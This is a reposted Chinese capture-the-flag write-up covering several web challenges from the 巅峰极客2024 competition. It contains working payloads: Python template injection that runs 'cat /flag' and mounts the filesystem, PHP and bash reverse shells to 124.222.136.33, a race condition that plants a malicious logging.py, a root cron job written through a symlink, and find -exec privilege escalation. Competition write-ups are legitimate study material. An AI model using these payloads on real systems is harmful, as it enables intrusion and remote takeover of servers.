ToB企服应用市场:ToB评测及商务社交产业平台
标题:
【Web】巅峰极客2024 部门题解
[打印本页]
作者:
梦应逍遥
时间:
2024-8-31 04:20
标题:
【Web】巅峰极客2024 部门题解
目录
EncirclingGame
GoldenHornKing
php_online
admin_Test
EncirclingGame
玩赢游戏就行
GoldenHornKing
利用点在传入的app
可以打python内存马
/calc?calc_req=config.__init__.__globals__['__builtins__']['exec']('app.add_api_route("/flag",lambda:__import__("os").popen("cat /flag").read());',{"app":app})
复制代码
访问./flag
也可以挂载静态文件
/calc?calc_req=lipsum.__globals__['__builtins__'].exec("from fastapi.staticfiles import StaticFiles;app.mount('/static', StaticFiles(directory='/'), name='static')", {"app": app})
复制代码
访问./static/flag
php_online
先起一个id为aaaaaaa1的沙箱,反弹shell
<?php system('php -r \'$sock=fsockopen("124.222.136.33",1337);exec("sh <&3 >&3 2>&3");\'');?>
复制代码
再起一个id为aaaaaaa2的沙箱,使得/sandbox/aaaaaaa2存在
再在aaaaaaa1环境里运行sh脚本条件竞争让init.py里import的恶意logging.py存在
init.py 中的logging会优先应用同目录下的logging.py,而非logging三方库
echo "__import__('os').popen('bash -c "bash -i >& /dev/tcp/124.222.136.33/1338 0>&1"')" > /tmp/logging.py
echo "while true; do" >> /tmp/exp.sh
echo " cp /tmp/logging.py /sandbox/aaaaaaa2/logging.py" >> /tmp/exp.sh
echo "done" >> /tmp/exp.sh
chmod +x /tmp/exp.sh
sh /tmp/exp.sh
复制代码
运行sh脚本后再进入aaaaaaa2环境,任意传一个<?php echo 1;?>触发sudo -u www-data python3 init.py
运行恶意logging.py后反弹shell拿到www-data权限
ps-aux
复制代码
发现开着定时任务
开一个id为aaaaaaa3的沙箱
ln -s /etc/cron.d /sandbox/aaaaaaa3
复制代码
再软链接定时任务目录
末了在aaaaaaa3的沙箱传入phpcode
* * * * * root cat /flag > /tmp/flag
# <?php sleep(1000);?>
复制代码
<?php sleep(1000);?>是为了制止rm *将/sandbox/aaaaaaa3/phpcode给瞬删,从而给定时任务运行充足的时间
admin_Test
扫出来./admin.html
访问./admin.html
可以上传文件,可以实行下令
下令部门fuzz出来的可用字符为t * . /,一眼实行临时文件. /t*/*
参考无字母数字rce(ctfshow web入门56)_过滤所有字母和数字的rce-CSDN博客
可以下令实行
但没法读/flag,考虑提权
可以打find提权
touch anyfile #必须要有这个文件
find anyfile -exec whoami \;
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4
